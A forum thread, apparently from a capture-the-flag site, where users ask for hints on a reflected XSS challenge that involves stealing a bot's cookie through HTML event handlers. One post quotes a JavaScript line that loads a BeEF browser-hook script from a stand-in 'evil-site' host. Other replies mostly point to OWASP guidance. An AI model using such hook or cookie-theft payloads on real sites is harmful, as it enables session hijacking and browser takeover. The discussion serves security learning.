0x0 Web - Client

Friday 2 November 2018, 13:09  #1
XSS REFLECTED
Boris
  • 11 posts

Hi. I am a bit stuck.
So I have discovered a place where I can use event handlers. I can get an alert box, but only interaction events like onclick are working.

But what would be the way to get the cookie? A hint?

tnx

Saturday 3 November 2018, 13:03  #2
Th1b4ud
  • 264 posts

The bot has the same behavior as a human. Have you tested all the events? https://www.w3schools.com/tags/ref_eventattributes.asp :)

Saturday 3 November 2018, 14:20  #3
Boris
  • 11 posts

Even if I find the event, and if we say that the bot is human-like, I cannot use the script tag, and I still need to send the location to my server. How would I achieve that in the tag?
Do I have to use BeEF?

Saturday 3 November 2018, 14:56  #4
Th1b4ud
  • 264 posts

XSS is not only <script>alert(1)</script>. There are multiple ways to exploit XSS. And why do you want to use BeEF? Do you know what BeEF is doing? Are you really sure it could be useful here?

Sunday 4 November 2018, 12:32  #5
Boris
  • 11 posts

Because the only place I have found is the tag space and several event handlers, so I cannot use the SCRIPT word
and I need to send the location.

I have found this script on the net:

var s = document.createElement('script'); s.src='http://evil-site/beef/hook/beefmagic.js.php'; document.getElementsByTagName('head')[0].appendChild(s);
BeEF can hook a browser and extract a cookie, but that didn't work for me..

How can I send the cookie in another way in the tag space?

Sunday 4 November 2018, 13:14  #6
Th1b4ud
  • 264 posts

Stop copy/pasting anything you find on the internet. You must understand what you are doing! There are several resources on the internet about XSS. Just google it.

Sunday 4 November 2018, 13:57  #7
Boris
  • 11 posts

I have read a lot...
But within the tag it's different. If I had an img tag it would be easy, using src, but this is different, or am I missing something? In what XSS direction should I read?

I can understand what happens in the script above: it's the creation of an object with script allowed, bypassing the XSS filter on the server, and then loading the BeEF JS hook, which can give control over a browser.

Sunday 4 November 2018, 14:26  #8
Th1b4ud
  • 264 posts

No, I think you don’t read a lot. First link in Google = OWASP guide. It’s the first thing you have to read. Why is it not done?
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

Saturday 24 November 2018, 04:17  #9
ttuongann
  • 3 posts

Hi Th1b4ud, I detected "a tag XSS", and I tried "onmouseover" but the bot doesn’t request cookies... any hint for me?

Saturday 24 November 2018, 11:34  #10
Th1b4ud
  • 264 posts

I think you are on the right track. Always check your source code after submitting your payload. You have to bypass some filters ;)

Tuesday 27 November 2018, 15:28  #11
ttuongann
  • 3 posts

Thanks Th1, I think I did everything I know. I exploited it on the "error page" and succeeded. However, when I reported it to the admin, the bot doesn’t request :(

Wednesday 5 December 2018, 17:06  #12
Boris
  • 11 posts

I have reflected XSS for myself, but how do I force an admin to it...?
I have found an HTML event and bypassed the " filter,
but there is one more filter if I want to use the XSS for the admin....
I need a (hero) hint please.

tnx